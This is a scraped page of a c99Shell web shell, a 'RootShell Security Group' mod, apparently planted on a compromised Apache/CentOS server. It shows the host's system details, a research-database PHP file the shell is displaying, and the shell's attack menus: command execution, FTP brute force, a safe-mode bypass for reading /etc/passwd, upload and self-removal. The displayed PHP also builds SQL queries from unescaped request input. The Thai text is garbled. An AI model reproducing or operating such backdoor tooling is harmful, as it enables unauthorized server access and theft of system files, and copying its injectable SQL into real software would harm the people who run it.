110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Research_depart/ drwxr-xr-x Free 52.66 GB of 127.8 GB (41.2%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Research_depart/ drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: Research.php (16.67 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
		require_once( "../includes/cURLRes.php" );
		
		
		/**  Create Database Object  */
		$dbObj = new DBConn;


			  $sql3 = "Select Teacher_code,First_name,Teacher_name,Teacher_lastname,Faculty_code From personal_tb    ";
 			 $result2= mysql_query($sql3);
			 $rss = mysql_fetch_array($result2);
	
		/**  Config Table for This Page  */
		$myTable = "research_tb";
		
		
		$myTable2PK = "Research_code";
		$myOrderBy = "Year_finish";
		
		$myTableField1 = "Research_name";    
		$myTableField2 = "Branch";
	

		/**  Parameters  */
	//	$params = " Year_prop = $Year_prop&Teacher_code=$Teacher_code ";
		
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
			
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }
		
			/**  Botton Name Action */
		$action = $_REQUEST['action'];
		$id = $_REQUEST['id'];
	
		if( isset($action) && !empty($action) ) {
			switch($action) {
				case "Delete" :
					$num = count($id);
					for( $i=0; $i<$num; $i++ ){

						//ЕєдїЕмаНЎКТГ Fulll Text
						$sql ="SELECT * FROM  research_filetex_tb WHERE Research_code = '$id[$i]'";
						$result = mysql_query($sql);
						while($rs = mysql_fetch_array($result)){
							unlink($ResearchPicPath.$rs["Filetex"]);
						}

						//ЕєдїЕмаНЎКТГ Abstract
						$sql ="SELECT * FROM  research_file_tb WHERE Research_code = '$id[$i]'";
						$result = mysql_query($sql);
						$rs = mysql_fetch_array($result);
						unlink($ResearchPicPath.$rs["Filetex"]);

						//Delete from research_tb, research_char_tb, research_file_tb, research_filetex_tb, research_success_tb, research_public_tb
						$qryDel = "DELETE rt, rct, rft, rftt, rst, rpt,rd FROM research_tb as rt 
									LEFT JOIN research_char_tb as rct ON rt.Research_code = rct.Research_code
									LEFT JOIN research_file_tb as rft ON rt.Research_code = rft.Research_code 
									LEFT JOIN research_filetex_tb as rftt ON rt.Research_code = rftt.Research_code 
									LEFT JOIN research_success_tb as rst ON rt.Research_code = rst.Research_code 
									LEFT JOIN research_public_tb as rpt ON rt.Research_code = rpt.Research_code
									LEFT JOIN research_dissemination  as rd ON rt.Research_code=rd.Research_code
									WHERE rt.Research_code='$id[$i]'";
						$resultDel = $dbObj->runQuery($qryDel);
						$dbObj->freeresult($resultDel);
					
						$res = deleteResearchCurl($id[$i]);
						
						$res =  deletePublicCurl($id[$i]);
						 
						 $res=  deleteFileCurl($id[$i]);
						 
						 $res =deleteSuccessCurl($id[$i]);
						 
						 $res =  deleteCharCurl($id[$i]);
						 
						 $res =checkDisseCurl($id[$i]);
						 
						 $res =deleteFiletexCurl($id[$i]); 
						 
					}
				break;
			} # switch
		} # if
		
	} # else
 ?>






ўйНБЩЕ§Т№ЗФЁСВбВЎµТБГТВєШ¤¤Е






  
    
    
    execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( isset($_GET['OrderBy']) ) {
			if( $keyword != "" ) { // гКи Keyword
				$query = "  SELECT *  FROM   research_tb rt, research_public_tb rb  WHERE    rt.Research_code = rb.Research_code  and ( rb.ReTyId='1'  Or  rb.ReTyId ='12' or  rb.ReTyId ='13'  )  and  ($myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  )  ORDER BY  $OrderBy  $ASCDESC ";
			} else {
				$query = " SELECT *  FROM research_tb rt, research_public_tb rb  WHERE    rt.Research_code = rb.Research_code  and ( rb.ReTyId='1'  Or  rb.ReTyId ='12' or  rb.ReTyId ='13'  )   ORDER BY  $OrderBy  $ASCDESC ";
			}
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			if( $keyword != "" ) { // гКи Keyword
				$query = "  SELECT *  FROM research_tb rt, research_public_tb rb  WHERE    rt.Research_code = rb.Research_code  and ( rb.ReTyId='1'  Or  rb.ReTyId ='12' or  rb.ReTyId ='13'  )  and  ($myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  ) ORDER BY  $myOrderBy  ASC ";
			} else {
				$query = " SELECT *  FROM   research_tb rt, research_public_tb rb  WHERE    rt.Research_code = rb.Research_code  and ( rb.ReTyId='1'  Or  rb.ReTyId ='12' or  rb.ReTyId ='13'  )  ORDER BY  $myOrderBy  DESC";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
		$countnum = $dbObj->_numrows;
    ?>
    
     
      
      
        
      
      
        Л№йТЛЕСЎ » ЁСґЎТГўйНБЩЕјЕ§Т№ » бЎйдўўйНБЩЕјЕ§Т№
        
      
         
      
      
         ‹ ВйН№ЎЕСє
      
      
         
      
      
        
      	
          
            ¤й№ЛТјЕ§Т№   
              
              
          
            ўйНБЩЕµиНЛ№йТ
          
          
        
           0 ) { ?>
          
            
              
                ·Сй§ЛБґ    :  
                
                јЕ§Т№  
              
                
                
            
            
              
              
              
          
          fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
          freeresult($result);
          ?>
        
          
            ЕУґСє
			ЄЧиНјЕ§Т№
            ЁСґЎТГ
            
            
          
            
            
              
              

»ГРаА·јЕ§Т№ :

     ЕСЎЙіРўН§јЕ§Т№ :

       ГЩ»бєє§Т№ЗФЁСВ :

       

»Х»ЇФ·Ф№


            
            
            
          
         
        
        
          
           0 ) { ?>
          
            
                
            
            
                Л№йТ: 
                     1) {	
                            $previous = $display - 1;					

                    ?>
bool(false)


:: Command execute ::
Enter:   Select:  



:: Shadow's tricks :D  ::

  
    Useful Commands 
    
    
      
        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  
   Kernel Info: 
      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  
    Php Safe-Mode Bypass (Read Files)
    


    
      
      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  
   Php Safe-Mode Bypass (List Directories):     
      

      Dir:  

 eg: /etc/


    
    




 :: Search ::  - regexp 
 :: Upload :: 
[ ok ]



:: Make Dir :: 
[ ok ] :: Make File :: 
[ ok ]

:: Go Dir ::  :: Go File :: 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--